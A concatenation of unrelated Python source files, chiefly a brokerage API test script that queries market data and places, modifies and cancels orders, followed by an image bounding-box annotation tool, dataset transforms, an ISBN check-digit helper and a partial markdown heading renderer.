print(quote_ctx.get_plate_list(market=Market.SH, plate_class=Plate.ALL))
print('获取板块下的股票列表 get_plate_stock')
print(quote_ctx.get_plate_stock(plate_code = 'HK.BK1160'))
print(quote_ctx.get_plate_stock(plate_code='SH.BK0045'))
print('获取牛牛程序全局状态 get_global_state')
print(quote_ctx.get_global_state())
print('获取历史K线 get_history_kline')
print(quote_ctx.get_history_kline(code='HK.02689',start=None,end=None,ktype=KLType.K_DAY,autype=AuType.QFQ,fields=[KL_FIELD.ALL]))
print(quote_ctx.get_history_kline(code='US.NSP', start=None, end=None, ktype=KLType.K_MON, autype=AuType.HFQ,fields=[KL_FIELD.ALL]))
print(quote_ctx.get_history_kline(code='SZ.300601', start=None, end=None, ktype=KLType.K_WEEK, autype=AuType.NONE,fields=[KL_FIELD.ALL]))
print('获取多支股票多个单点历史K线 get_multi_points_history_kline')
print(quote_ctx.get_multi_points_history_kline(code_list = ['HK.00700','US.JD','SH.000001'],dates=['2018-01-01', '2018-08-02'],fields=KL_FIELD.ALL,ktype=KLType.K_15M,autype=AuType.HFQ,no_data_mode=KLNoDataMode.BACKWARD))
quote_ctx.close()
def test_quotation_async(self):
        # All asynchronous quotation (market data) interfaces
quote_ctx = OpenQuoteContext(self.host, self.port)
quote_ctx.start()
        # Set up push handlers (listeners)
handlers = [CurKlineTest(),OrderBookTest(),RTDataTest(),TickerTest(),StockQuoteTest(),BrokerTest()]
for handler in handlers:
quote_ctx.set_handler(handler)
        # Subscribe
codes = ['HK.00700','HK.62423','HK.800000','US.AAPL','SH.601318','SH.000001','SZ.000001']
quote_ctx.subscribe(code_list = codes, subtype_list = self.subTypes)
        time.sleep(5*60)  # keep the subscription running for 5 minutes
quote_ctx.stop()
quote_ctx.close()
def test_trade(self,tradeEnv = TrdEnv.REAL):
        # Trading
trade_hk = OpenHKTradeContext(self.host, self.port)
trade_us = OpenUSTradeContext(self.host, self.port)
if tradeEnv == TrdEnv.REAL:
trade_cn = OpenHKCCTradeContext(self.host, self.port) #A股通
else:
trade_cn = OpenCNTradeContext(self.host, self.port) #web模拟交易
print('交易环境:',tradeEnv)
        # Unlock trading (unlock_trade)
trade_pwd = '<PASSWORD>'
print('HK解锁交易',trade_hk.unlock_trade(trade_pwd))
print('US解锁交易', trade_us.unlock_trade(trade_pwd))
print('CN解锁交易', trade_cn.unlock_trade(trade_pwd))
        # Set up push handlers
handler_tradeOrder = TradeOrderTest()
handler_tradeDealtrade = TradeDealTest()
trade_hk.set_handler(handler_tradeOrder)
trade_hk.set_handler(handler_tradeDealtrade)
trade_us.set_handler(handler_tradeOrder)
trade_us.set_handler(handler_tradeDealtrade)
trade_cn.set_handler(handler_tradeOrder)
trade_cn.set_handler(handler_tradeDealtrade)
        # Start async push
trade_hk.start()
trade_us.start()
trade_cn.start()
        # Place orders: place_order
price_hk = 5.96
qty_hk = 500
code_hk = 'HK.1357'
price_us = 36.28
qty_us = 2
code_us = 'US.JD'
price_cn = 8.94
qty_cn = 100
code_cn = 'SZ.000001'
for i in range(3):
#港股普通订单-买入
print('港股普通订单-买入')
print(trade_hk.place_order(price=price_hk - i, qty=qty_hk * i,
code=code_hk,
trd_side=TrdSide.BUY,
order_type=OrderType.NORMAL,
adjust_limit=0, trd_env=tradeEnv,
acc_id=0))
#港股普通订单-卖出
print('港股普通订单-卖出')
print(trade_hk.place_order(price=price_hk - i, qty=qty_hk * i,
code=code_hk,
trd_side=TrdSide.SELL,
order_type=OrderType.NORMAL,
adjust_limit=0, trd_env=tradeEnv,
acc_id=0))
#美股普通订单-买入
print('股普通订单-买入')
print(trade_us.place_order(price=price_us - i, qty=qty_us * i,
code=code_us,
trd_side=TrdSide.BUY,
order_type=OrderType.NORMAL,
adjust_limit=0, trd_env=tradeEnv,
acc_id=0))
# 美股普通订单-卖出
print('股普通订单-卖出')
print(trade_us.place_order(price=price_us + i, qty=qty_us * i,
code=code_us,
trd_side=TrdSide.SELL,
order_type=OrderType.NORMAL,
adjust_limit=0, trd_env=tradeEnv,
acc_id=0))
#A股普通订单-买入
print('A股普通订单-买入')
print(trade_cn.place_order(price=price_cn + i, qty=qty_cn * i,
code=code_cn,
trd_side=TrdSide.SELL,
order_type=OrderType.NORMAL,
adjust_limit=0,
trd_env=tradeEnv, acc_id=0))
print('A股普通订单-卖出')
print(trade_cn.place_order(price=price_cn + i, qty=qty_cn * i,
code=code_cn,
trd_side=TrdSide.SELL,
order_type=OrderType.NORMAL,
adjust_limit=0,
trd_env=tradeEnv, acc_id=0))
        # Query today's orders: order_list_query
ret_code_order_list_query_hk, ret_data_order_list_query_hk = trade_hk.order_list_query(order_id="",
status_filter_list=[],
code='', start='',
end='',
trd_env=tradeEnv,
acc_id=0)
print('港股今日订单 ',ret_code_order_list_query_hk, ret_data_order_list_query_hk)
ret_code_order_list_query_us, ret_data_order_list_query_us = trade_us.order_list_query(order_id="",
status_filter_list=[],
code='', start='',
end='',
trd_env=tradeEnv,
acc_id=0)
print('美股今日订单 ',ret_code_order_list_query_us, ret_data_order_list_query_us)
ret_code_order_list_query_cn, ret_data_order_list_query_cn = trade_cn.order_list_query(order_id="",
status_filter_list=[],
code='', start='',
end='',
trd_env=tradeEnv,
acc_id=0)
print('A股今日订单 ',ret_code_order_list_query_cn, ret_data_order_list_query_cn)
        # Modify orders: modify_order
order_ids_hk = ret_data_order_list_query_hk.data['order_id'].tolist()
order_ids_us = ret_data_order_list_query_us.data['order_id'].tolist()
order_ids_cn = ret_data_order_list_query_cn.data['order_id'].tolist()
for order_id_hk in order_ids_hk:
#港股-修改订单数量/价格
print('港股改单,order_id = ',order_id_hk)
print(trade_hk.modify_order(modify_order_op=ModifyOrderOp.NORMAL, order_id=order_id_hk , qty=qty_hk*2, price=price_hk-1, adjust_limit=0,
trd_env=tradeEnv, acc_id=0))
time.sleep(2)
#撤单
print('港股撤单,order_id = ', order_id_hk)
print(trade_hk.modify_order(modify_order_op=ModifyOrderOp.CANCEL, order_id=order_id_hk, qty=0, price=0, adjust_limit=0,
trd_env=tradeEnv, acc_id=0))
for order_id_us in order_ids_us:
#美股-修改订单数量/价格
print('美股改单,order_id = ',order_id_us)
print(trade_us.modify_order(modify_order_op=ModifyOrderOp.NORMAL, order_id=order_id_us , qty=qty_us*2, price=price_us-1, adjust_limit=0,
trd_env=tradeEnv, acc_id=0))
time.sleep(2)
#撤单
print('美股撤单,order_id = ', order_id_us)
print(trade_us.modify_order(modify_order_op=ModifyOrderOp.CANCEL, order_id=order_id_us, qty=0, price=0, adjust_limit=0,
trd_env=tradeEnv, acc_id=0))
for order_id_cn in order_ids_cn:
#A股-修改订单数量/价格
print('A股改单,order_id = ',order_id_cn)
print(trade_cn.modify_order(modify_order_op=ModifyOrderOp.NORMAL, order_id=order_id_cn , qty=qty_cn*2, price=price_cn-1, adjust_limit=0,
trd_env=tradeEnv, acc_id=0))
time.sleep(2)
#撤单
print('A股撤单,order_id = ', order_id_cn)
print(trade_cn.modify_order(modify_order_op=ModifyOrderOp.CANCEL, order_id=order_id_cn, qty=0, price=0, adjust_limit=0,
trd_env=tradeEnv, acc_id=0))
        # Query account info: accinfo_query
print('HK 账户信息')
print(trade_hk.accinfo_query(trd_env=tradeEnv, acc_id=0))
print('US 账户信息')
print(trade_us.accinfo_query(trd_env=tradeEnv, acc_id=0))
print('CN 账户信息')
print(trade_cn.accinfo_query(trd_env=tradeEnv, acc_id=0))
        # Query position list: position_list_query
print('HK 持仓列表')
print(trade_hk.position_list_query( code='', pl_ratio_min=None, pl_ratio_max=None, trd_env=tradeEnv, acc_id=0))
print('US 持仓列表')
print(trade_us.position_list_query(code='', pl_ratio_min=None, pl_ratio_max=None, trd_env=tradeEnv, acc_id=0))
print('CN 持仓列表')
print(trade_cn.position_list_query(code='', pl_ratio_min=None, pl_ratio_max=None, trd_env=tradeEnv, acc_id=0))
        # Query historical order list: history_order_list_query
print('HK 历史订单列表')
print(trade_hk.history_order_list_query(status_filter_list=[], code='', start='', end='',
trd_env=tradeEnv, acc_id=0))
print('US 历史订单列表')
print(trade_us.history_order_list_query(status_filter_list=[], code='', start='', end='',
trd_env=tradeEnv, acc_id=0))
print('CN 历史订单列表')
print(trade_cn.history_order_list_query(status_filter_list=[], code='', start='', end='',
trd_env=tradeEnv, acc_id=0))
        # Query today's deal list: deal_list_query
print('HK 今日成交列表')
print(trade_hk.deal_list_query(code="", trd_env=tradeEnv, acc_id=0))
print('US 今日成交列表')
print(trade_us.deal_list_query(code="", trd_env=tradeEnv, acc_id=0))
print('CN 今日成交列表')
print(trade_cn.deal_list_query(code="", trd_env=tradeEnv, acc_id=0))
        # Query historical deal list: history_deal_list_query
print('HK 历史成交列表')
print(trade_hk.history_deal_list_query(code = '', start='', end='', trd_env=tradeEnv, acc_id=0))
print('US 历史成交列表')
print(trade_us.history_deal_list_query(code='', start='', end='', trd_env=tradeEnv, acc_id=0))
print('CN 历史成交列表')
print(trade_cn.history_deal_list_query(code='', start='', end='', trd_env=tradeEnv, acc_id=0))
class CurKlineTest(CurKlineHandlerBase):
    '''Real-time candlestick data: get_cur_kline and CurKlineHandlerBase'''
def on_recv_rsp(self, rsp_pb):
ret_code, ret_data = super(CurKlineTest, self).on_recv_rsp(rsp_pb)
# 打印,记录日志
print('CurKlineHandlerBase ', ret_code)
print(ret_data)
return RET_OK, ret_data
class OrderBookTest(OrderBookHandlerBase):
def on_recv_rsp(self, rsp_pb):
ret_code, ret_data = super(OrderBookTest, self).on_recv_rsp(rsp_pb)
# 打印
print('OrderBookHandlerBase ', ret_code)
print(ret_data)
return RET_OK, ret_data
class RTDataTest(RTDataHandlerBase):
def on_recv_rsp(self, rsp_pb):
ret_code, ret_data = super(RTDataTest, self).on_recv_rsp(rsp_pb)
# 打印信息
print('RTDataHandlerBase ', ret_code)
print(ret_data)
return RET_OK, ret_data
class TickerTest(TickerHandlerBase):
    '''Tick-by-tick data: get_rt_ticker and TickerHandlerBase'''
def on_recv_rsp(self, rsp_pb):
ret_code, ret_data = super(TickerTest, self).on_recv_rsp(rsp_pb)
# 打印
print('TickerHandlerBase ', ret_code)
print(ret_data)
return RET_OK, ret_data
class StockQuoteTest(StockQuoteHandlerBase):
    # Stock quotes: get_stock_quote and StockQuoteHandlerBase
def on_recv_rsp(self, rsp_str):
ret_code, ret_data = super(StockQuoteTest, self).on_recv_rsp(
rsp_str) # 基类的on_recv_rsp方法解包返回了报价信息,格式与get_stock_quote一样
# 打印
print('StockQuoteTest ', ret_code)
print(ret_data)
return RET_OK, ret_data
class BrokerTest(BrokerHandlerBase):
def on_recv_rsp(self, rsp_pb):
ret_code, stock_code, ret_data = super(BrokerTest, self).on_recv_rsp(rsp_pb)
# 打印
print('BrokerHandlerBase ', ret_code)
print(stock_code)
print(ret_data)
return RET_OK, ret_data
class TradeOrderTest(TradeOrderHandlerBase):
    '''Order status push updates'''
def on_recv_rsp(self, rsp_pb):
ret_code,ret_data = super(TradeOrderTest, self).on_recv_rsp(rsp_pb)
print('TradeOrderHandlerBase ret_code = %d, ret_data = \n%s'%(ret_code,str(ret_data)))
return RET_OK,ret_data
class TradeDealTest(TradeDealHandlerBase):
    '''Order deal (fill) push updates'''
def on_recv_rsp(self, rsp_pb):
ret_code,ret_data = super(TradeDealTest, self).on_recv_rsp(rsp_pb)
print('TradeDealHandlerBase ret_code = %d, ret_data = \n%s' % (ret_code,str(ret_data)))
return RET_OK,ret_data
if __name__ == '__main__':
aa = ALLApi()
aa.test_quotation()
aa.test_quotation_async()
    aa.test_trade(TrdEnv.REAL)
    aa.test_trade(TrdEnv.SIMULATE)
|
StarcoderdataPython
|
3320771
|
from operator import itemgetter
class ColorsForCounts(object):
"""
Maintain a collection of count thresholds and colors with methods to get a
color or a CSS name for a count.
@param colors: An C{iterable} of space separated "value color" strings,
such as ["100 red", "200 rgb(23, 190, 207)", "700 #CF3CF3"]. Or C{None}
if no colors (other than C{defaultColor}) should be used.
@param defaultColor: The C{str} color to use for counts that do not reach
the lowest count threshold for any color in C{colors}.
@raise ValueError: If an incorrect count/color pair is found in C{colors}.
"""
def __init__(self, colors, defaultColor='black'):
thresholds = set()
result = []
if colors:
for colorInfo in colors:
fields = colorInfo.split(None, 1)
if len(fields) == 2:
threshold, color = fields
try:
threshold = int(threshold)
except ValueError:
raise ValueError(
'color arguments must be given as space-separated '
'pairs of "count color" where the count is an '
'integer threshold. Your value (%r) was not '
'an integer.' % threshold)
if threshold < 0:
raise ValueError(
'color arguments must be given as space-separated '
'pairs of "count color" where the count is '
'non-negative. Your value (%r) is less than 0.' %
threshold)
if threshold in thresholds:
raise ValueError(
'repeated color argument count (%d).' % threshold)
result.append((threshold, color))
thresholds.add(threshold)
else:
raise ValueError(
'color arguments must be given as space-separated '
'pairs of "value color". Your value (%r) does not '
'contain a space.' % colorInfo)
result.sort(key=itemgetter(0), reverse=True)
if not result or result[-1][0] > 0:
result.append((0, defaultColor))
self.colors = tuple(result)
def thresholdToCssName(self, threshold):
"""
Turn a count threshold into a string that can be used as a CSS
class name.
@param threshold: The C{int} threshold.
@raise ValueError: If the threshold is not an C{int}.
@return: A C{str} CSS class name.
"""
return 'threshold-%d' % threshold
def thresholdForCount(self, count):
"""
Get the best threshold for a specific count.
@param count: An C{int} count.
@return: The first C{int} threshold that the given count is at least
as big as.
"""
assert count >= 0, 'Count (%d) cannot be negative.' % count
for threshold, _ in self.colors:
if count >= threshold:
return threshold
raise ValueError('This should never happen! Last threshold is not 0?')
def colorForCount(self, count):
"""
Get the color for a count.
@param count: An C{int} count.
@return: The C{str} color for the count.
"""
assert count >= 0, 'Count (%d) cannot be negative.' % count
for threshold, color in self.colors:
if count >= threshold:
return color
raise ValueError('This should never happen! Last threshold is not 0?')
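

# A minimal usage sketch (not part of the original module); the thresholds and
# colors below are made up purely for illustration.
if __name__ == '__main__':
    cfc = ColorsForCounts(['100 red', '200 rgb(23, 190, 207)', '700 #CF3CF3'])
    print(cfc.colorForCount(50))         # no threshold reached -> 'black' (the default)
    print(cfc.colorForCount(250))        # >= 200 -> 'rgb(23, 190, 207)'
    print(cfc.thresholdForCount(250))    # -> 200
    print(cfc.thresholdToCssName(200))   # -> 'threshold-200'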
|
StarcoderdataPython
|
1603576
|
from polygraphy.tools.inspect.subtool.model import Model
from polygraphy.tools.inspect.subtool.data import Data
|
StarcoderdataPython
|
1735464
|
# author: <NAME>
from p5 import *
import sympy as sym
import mpmath as mp
import numpy as np
from tkinter import Tk
from scipy.spatial import distance
import PIL
from PIL import Image
import argparse
import os
import csv
import mimetypes
DEBUG = False
parser = argparse.ArgumentParser(
description='Custom frame annotator implemented in p5 and python.')
parser.add_argument('--input', dest='input',
help='Path to the directory with the input images', required=False, type=str, default='input/'),
parser.add_argument('--output', dest='output',
help='Path to the directory with the output images', required=False, type=str, default='output/'),
parser.add_argument('--cache', dest='cache',
help='Path to the cache directory (DON\'T INCLUDE \\)', required=False, type=str, default='cache'),
parser.add_argument('--scale', dest='scale',
help='scaling factor for viewing images', required=False, type=float, default=0.3),
root = Tk()
width = root.winfo_screenwidth()
height = root.winfo_screenheight()
window_offset = 200
image_width = width - window_offset
image_height = (height/width) * image_width
args = parser.parse_args()
input_dir = args.input
output_dir = args.output
cache_dir = args.cache
dirs = []
images = []
img_size = []
index = 0
points = []
c_points = []
lines = []
rectangles = []
p_colors = []
l_colors = []
last_action = 'script started'
std_color = Color(255, 255, 255) # white
a_color = Color(255, 0, 0) # azure
b_color = Color(0, 255, 0) # rose
c_color = Color(0, 0, 255) # pastel orange
def validate_dirs():
global DEBUG, input_dir, output_dir, cache_dir
dir_list = [input_dir, output_dir, cache_dir]
for directory in dir_list:
if not os.path.exists(directory):
os.makedirs(directory)
if DEBUG:
print('[validate_dirs] Validated Directories')
def load():
global DEBUG, last_action, points, dirs, images, img_size, index, input_dir, output_dir, args, width, height, image_width, image_height, lines, p_colors, l_colors, a_color, b_color, c_color, rectangles
validate_dirs()
load_images_from_folder(input_dir)
rectangles = load_bbox_from_file()
last_action = 'loaded images'
def setup():
global DEBUG, last_action, points, dirs, images, img_size, index, input_dir, output_dir, args, width, height, image_width, image_height, lines, p_colors, l_colors, a_color, b_color, c_color, rectangles
size(width - window_offset, image_height)
title('Light-notator')
last_action = 'setup window'
no_loop()
rect_mode(mode='CENTER')
def check_index():
global index
if index > len(images) - 1:
index = 0
if index < 0:
index = len(images) - 1
def draw():
global DEBUG, last_action, points, dirs, images, img_size, index, input_dir, output_dir, args, width, height, image_width, image_height, lines, p_colors, l_colors, a_color, b_color, c_color, rectangles
background(255)
check_index()
image(images[index], (0, 0), (image_width, image_height))
text(f'index: {index}', (5, 5))
text(f'current image: ({dirs[index]})', (5, 15))
text(f'# points: {len(points)}', (5, 25))
text(f'last action: ({last_action})', (5, 35))
for m_rectangle in rectangles:
no_fill()
stroke_weight(2)
stroke(117, 255, 117)
x_translate = floor(m_rectangle[0] * img_size[index][0])
y_translate = floor(m_rectangle[1] * img_size[index][1])
rect_width = floor(m_rectangle[2] * img_size[index][0])
rect_height = floor(m_rectangle[3] * img_size[index][1])
translate(x_translate, y_translate)
rotate(m_rectangle[4])
rect((0, 0), rect_width, rect_height)
rotate(-1 * m_rectangle[4])
translate(-1 * x_translate, -1 * y_translate)
color_index = 0
for m_point in points:
fill(p_colors[color_index])
stroke_weight(1)
stroke(41)
ellipse((m_point[0], m_point[1]), 5, 5)
color_index += 1
color_index = 0
for m_line in lines:
fill(l_colors[color_index])
line(m_line[0], m_line[1])
color_index += 1
fill(std_color)
def mouse_pressed():
global DEBUG, last_action, points, dirs, images, img_size, index, input_dir, output_dir, args, width, height, image_width, image_height, lines, p_colors, l_colors, a_color, b_color, c_color, rectangles
if DEBUG:
print(f'mouse pressed at ({mouse_x},{mouse_y})')
add_point(mouse_x, mouse_y, std_color)
constrain_square()
redraw()
def key_pressed():
global DEBUG, last_action, points, dirs, images, img_size, index, input_dir, output_dir, args, width, height, image_width, image_height, lines, p_colors, l_colors, a_color, b_color, c_color, rectangles
if ((key == 'R') or (key == 'r')):
remove_point()
if ((key == 'c') or (key == 'C')):
points = []
lines = []
rectangles = []
p_colors = []
l_colors = []
last_action = 'cleared all points'
if (key == 'd'):
redraw()
if (key == "2"):
last_action = 'moved to next frame'
write_bbox_to_file()
index += 1
check_index()
rectangles = load_bbox_from_file()
if (key == "1"):
last_action = 'moved to previous frame'
write_bbox_to_file()
index -= 1
check_index()
rectangles = load_bbox_from_file()
redraw()
def load_images_from_folder(folder):
global DEBUG, last_action, points, dirs, images, img_size, index, input_dir, output_dir, args, width, height, image_width, image_height, lines, p_colors, l_colors, a_color, b_color, c_color, rectangles
for filename in os.listdir(folder):
img_dir = os.path.join(folder, filename)
file_type = str(mimetypes.guess_type(img_dir)[0])[0:5]
if file_type == 'image':
temp_img = Image.open(img_dir)
wsize = int((float(temp_img.size[0]) * float(args.scale)))
hsize = int((float(temp_img.size[1]) * float(args.scale)))
temp_img = temp_img.resize((wsize, hsize), PIL.Image.ANTIALIAS)
new_dir = os.path.join(args.cache, filename)
temp_img.save(f'{new_dir}')
img_size.append((image_width, image_height))
dirs.append(new_dir)
images.append(load_image(new_dir))
dirs, images, img_size = (list(t)
for t in zip(*sorted(zip(dirs, images, img_size))))
def add_point(in_x, in_y, color):
global DEBUG, last_action, points, dirs, images, img_size, index, input_dir, output_dir, args, width, height, image_width, image_height, lines, p_colors, l_colors, a_color, b_color, c_color, rectangles
if in_x <= image_width and in_y <= image_height:
points.append((in_x, in_y))
p_colors.append(color)
last_action = 'added point'
def add_line(temp_point_0, temp_point_1, color):
global DEBUG, last_action, points, dirs, images, img_size, index, input_dir, output_dir, args, width, height, image_width, image_height, lines, p_colors, l_colors, a_color, b_color, c_color, rectangles
lines.append((temp_point_0, temp_point_1))
l_colors.append(Color(0, 0, 0))
def constrain_square():
global DEBUG, last_action, points, dirs, images, img_size, index, input_dir, output_dir, args, width, height, image_width, image_height, lines, p_colors, l_colors, a_color, b_color, c_color, rectangles
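    # Once three points have been clicked, the two points furthest apart are
    # treated as a diagonal and the remaining point as an adjacent corner; the
    # fourth corner is then derived so the angles are right angles, and the
    # result is stored via add_rectangle() as a rotated box (center, width,
    # height, tilt) in coordinates relative to the image size.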
if len(points) == 3:
dist = []
pairs = []
for pointA in points:
for pointB in points:
dist.append(abs(distance.euclidean(pointA, pointB)))
pairs.append((pointA, pointB))
for point in points:
# arbitrarily define temporary points in order to find pointC
if not ((point == pairs[dist.index(max(dist))][0]) or (point == pairs[dist.index(max(dist))][1])):
pointC = point
hypot = max(dist)
temp_distance_0 = abs(distance.euclidean(
pointC, pairs[dist.index(max(dist))][0]))
temp_distance_1 = abs(distance.euclidean(
pointC, pairs[dist.index(max(dist))][1]))
if (temp_distance_0 > temp_distance_1):
pointA = pairs[dist.index(max(dist))][0]
pointB = pairs[dist.index(max(dist))][1]
angle_flip = False
else:
pointA = pairs[dist.index(max(dist))][1]
pointB = pairs[dist.index(max(dist))][0]
angle_flip = True
if DEBUG:
p_colors[points.index(pointA)] = a_color
p_colors[points.index(pointB)] = b_color
p_colors[points.index(pointC)] = c_color
leg1 = abs(distance.euclidean(pointC, pointA))
hypot = abs(distance.euclidean(pointB, pointA))
leg1_vector = (pointC[0] - pointA[0], pointC[1] - pointA[1])
hypot_vector = (pointB[0] - pointA[0], pointB[1] - pointA[1])
if DEBUG:
add_line(pointA, pointB, std_color)
print(
f'leg vector is {leg1_vector} and hyp_vector is {hypot_vector}')
print(
f'pointA is {pointA} and pointB is {pointB} and pointC is {pointC}')
theta = sym.acos(
(leg1_vector[0]*hypot_vector[0]+leg1_vector[1]*hypot_vector[1])/(leg1*hypot))
std_unit_vector = (1, 0)
theta_prime = sym.acos((leg1_vector[0]*std_unit_vector[0] +
leg1_vector[1]*std_unit_vector[1])/(leg1))
leg2 = leg1 * mp.tan(theta)
increment = (leg2 * mp.sin(theta_prime),
leg2 * mp.cos(theta_prime))
temp_b_check = pointB[0] > pointA[0]
if pointC[1] > pointA[1]:
increment = (-1 * increment[0], increment[1])
if not (temp_b_check == (float(pointC[0] + increment[0]) > pointA[0])):
increment = (-1 * increment[0], -1 * increment[1])
third_point = (float(pointC[0] + increment[0]),
float(pointC[1] + increment[1]))
points[points.index(pointB)] = third_point
pointB = third_point
pointD = (float(pointA[0] + increment[0]),
float(pointA[1] + increment[1]))
add_point(pointD[0], pointD[1], std_color)
validate_constraint()
angle_factor = -1
rectangle_tilt = get_angle([pointC[0], pointC[1]], [pointA[0], pointA[1]], [
pointA[0] + 20, pointA[1]])
if DEBUG:
print(f'rectangle tilt is: {180 * rectangle_tilt / mp.pi}')
rectangle_tilt *= angle_factor
if DEBUG:
print(f'shifted rectangle tilt is: {180 * rectangle_tilt / mp.pi}')
rectangle_width = abs(distance.euclidean(pointC, pointA))
rectangle_height = abs(distance.euclidean(pointD, pointA))
averageX = 0
averageY = 0
for point in points:
averageX += point[0]
averageY += point[1]
averageX /= len(points)
averageY /= len(points)
add_rectangle(averageX, averageY, rectangle_width,
rectangle_height, rectangle_tilt)
points = []
else:
last_action = 'constrain_square failed: not enough points'
lines = []
def add_rectangle(in_x, in_y, rectangle_width, rectangle_height, rectangle_tilt):
global DEBUG, last_action, points, dirs, images, img_size, index, input_dir, output_dir, args, width, height, image_width, image_height, lines, p_colors, l_colors, a_color, b_color, c_color, rectangles
x_relative = in_x/img_size[index][0]
y_relative = in_y/img_size[index][1]
rect_width_relative = rectangle_width/img_size[index][0]
rect_height_relative = rectangle_height/img_size[index][1]
rectangles.append((x_relative, y_relative, rect_width_relative,
rect_height_relative, rectangle_tilt))
def validate_constraint():
global DEBUG, last_action, points, dirs, images, img_size, index, input_dir, output_dir, args, width, height, image_width, image_height, lines, p_colors, l_colors, a_color, b_color, c_color, rectangles
angles = []
for pointA in points:
for pointB in points:
if pointB == pointA:
continue
for pointC in points:
if pointC == pointA or pointC == pointB:
continue
angle = 180 * get_angle(pointA, pointB, pointC) / np.pi
if angle == 90 or (angle > 89.9 and angle < 90.1):
angles.append(angle)
if DEBUG:
print(f'validated constraints: corner angles are {angles[0:4]}')
def get_angle(pointA, pointB, pointC):
v1 = [pointA[0] - pointB[0], pointA[1] - pointB[1]]
v2 = [pointC[0] - pointB[0], pointC[1] - pointB[1]]
angle = np.arccos(
np.dot(v1, v2) / (np.linalg.norm(v1) * np.linalg.norm(v2)))
if pointA[1] > pointC[1]:
angle *= -1
return angle
def remove_point():
global DEBUG, last_action, points, dirs, images, img_size, index, input_dir, output_dir, args, width, height, image_width, image_height, lines, p_colors, l_colors, a_color, b_color, c_color, rectangles
curr_pos = (mouse_x, mouse_y)
dist = []
for point in points:
dist.append(distance.euclidean(point, curr_pos))
points.pop(dist.index(min(dist)))
last_action = 'removed closest point'
constrain_square()
def load_bbox_from_file():
global DEBUG, last_action, points, dirs, images, img_size, index, input_dir, output_dir, args, width, height, image_width, image_height, lines, p_colors, l_colors, a_color, b_color, c_color, rectangles
file_dir = dirs[index].replace('cache', 'input')
file_dir = os.path.splitext(file_dir)[0]+'.csv'
if os.path.isfile(file_dir):
temp_rectangles = []
if DEBUG:
print('There are encoded annotations in corresponding text file.')
with open(file_dir) as csvfile:
readCSV = csv.reader(csvfile, delimiter=',')
for row in readCSV:
if not (row == []):
temp_rectangles.append(
(float(row[0]), float(row[1]), float(row[2]), float(row[3]), float(row[4])))
return temp_rectangles
else:
if DEBUG:
print('There are no encoded annotations in corresponding text file.')
return []
def write_bbox_to_file():
global DEBUG, last_action, points, dirs, images, img_size, index, input_dir, output_dir, args, width, height, image_width, image_height, lines, p_colors, l_colors, a_color, b_color, c_color, rectangles
file_dir = dirs[index].replace('cache', 'input')
file_dir = os.path.splitext(file_dir)[0]+'.csv'
if os.path.isfile(file_dir):
os.remove(file_dir)
with open(file_dir, 'w') as csvfile:
filewriter = csv.writer(csvfile, delimiter=',',
quotechar='|', quoting=csv.QUOTE_MINIMAL)
for m_rectangle in rectangles:
tmp_lst = [m_rectangle[0], m_rectangle[1],
m_rectangle[2], m_rectangle[3], m_rectangle[4]]
filewriter.writerow(tmp_lst)
if __name__ == '__main__':
load()
run()
|
StarcoderdataPython
|
3328353
|
<gh_stars>0
# Generated by Django 2.0.9 on 2019-01-21 15:08
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('oauth2_provider', '0008_auto_20181115_1642'),
]
operations = [
migrations.AlterField(
model_name='grant',
name='redirect_uri',
field=models.CharField(max_length=1024),
),
]
|
StarcoderdataPython
|
3215441
|
<gh_stars>10-100
import torch.utils.data as data
from PIL import Image
import torchvision.transforms as transforms
class BaseDataset(data.Dataset):
def __init__(self):
super(BaseDataset, self).__init__()
def name(self):
return 'BaseDataset'
def initialize(self, opt):
pass
def get_transform(opt):
transform_list = []
if opt.resize_or_crop == 'resize_and_crop':
osize = [opt.loadSizeX, opt.loadSizeY]
transform_list.append(transforms.Scale(osize, Image.BICUBIC))
transform_list.append(transforms.RandomCrop(opt.fineSize))
elif opt.resize_or_crop == 'crop':
transform_list.append(transforms.RandomCrop(opt.fineSize))
elif opt.resize_or_crop == 'scale_width':
transform_list.append(transforms.Lambda(
lambda img: __scale_width(img, opt.fineSize)))
elif opt.resize_or_crop == 'scale_width_and_crop':
transform_list.append(transforms.Lambda(
lambda img: __scale_width(img, opt.loadSizeX)))
transform_list.append(transforms.RandomCrop(opt.fineSize))
if opt.isTrain and not opt.no_flip:
transform_list.append(transforms.RandomHorizontalFlip())
transform_list += [transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5),
(0.5, 0.5, 0.5))]
return transforms.Compose(transform_list)
def __scale_width(img, target_width):
ow, oh = img.size
if (ow == target_width):
return img
w = target_width
h = int(target_width * oh / ow)
return img.resize((w, h), Image.BICUBIC)
|
StarcoderdataPython
|
4841002
|
<gh_stars>1-10
def get_legal_isbn(isbn):
if len(isbn) == 10:
return cal_10bit_isbn(isbn)
elif len(isbn) == 13:
return cal_13bit_isbn(isbn)
return False
def cal_10bit_isbn(isbn):
    sum = 0
    for i in range(9):
        sum += (10 - i) * (ord(isbn[i]) - ord('0'))
    # ISBN-10: the check digit is (11 - weighted_sum % 11) % 11, with 10 written as 'X'
    n = (11 - sum % 11) % 11
    if n == 10:
        end = 'X'
    else:
        end = str(n)
    return isbn[:9] + end
def cal_13bit_isbn(isbn):
sum = 0
for i in range(0, 11, 2):
sum += ord(isbn[i]) - ord('0')
for i in range(1, 13, 2):
sum += 3 * (ord(isbn[i]) - ord('0'))
return isbn[:12] + str((10 - sum % 10) % 10)
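# A worked check of the two formulas above: for the ISBN-10 prefix 030640615 the
# weighted sum is 0*10 + 3*9 + 0*8 + 6*7 + 4*6 + 0*5 + 6*4 + 1*3 + 5*2 = 130,
# 130 % 11 = 9, so the check digit is (11 - 9) % 11 = 2, giving 0306406152.
# For ISBN-13, odd positions (1st, 3rd, ...) get weight 1 and even positions weight 3,
# and the check digit is (10 - sum % 10) % 10.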
if __name__ == "__main__":
print(get_legal_isbn("9787302555541"))
|
StarcoderdataPython
|
1638414
|
<reponame>Hoto-Cocoa/openNAMU<filename>route/tool/set_mark/markdown.py
from . import tool
import datetime
import html
import re
class head_render:
def __init__(self):
self.head_level = [0, 0, 0, 0, 0, 0]
self.toc_data = '' + \
'<div id="toc">' + \
'<span id="toc_title">TOC</span>' + \
'<br>' + \
'<br>' + \
''
self.toc_num = 0
def __call__(self, match):
head_len_num = len(match[1])
head_len = str(head_len_num)
head_len_num -= 1
head_data = match[2]
self.head_level[head_len_num] += 1
for i in range(head_len_num + 1, 6):
self.head_level[i] = 0
self.toc_num += 1
toc_num_str = str(self.toc_num)
head_level_str_2 = '.'.join([str(i) for i in self.head_level if i != 0])
head_level_str = head_level_str_2 + '.'
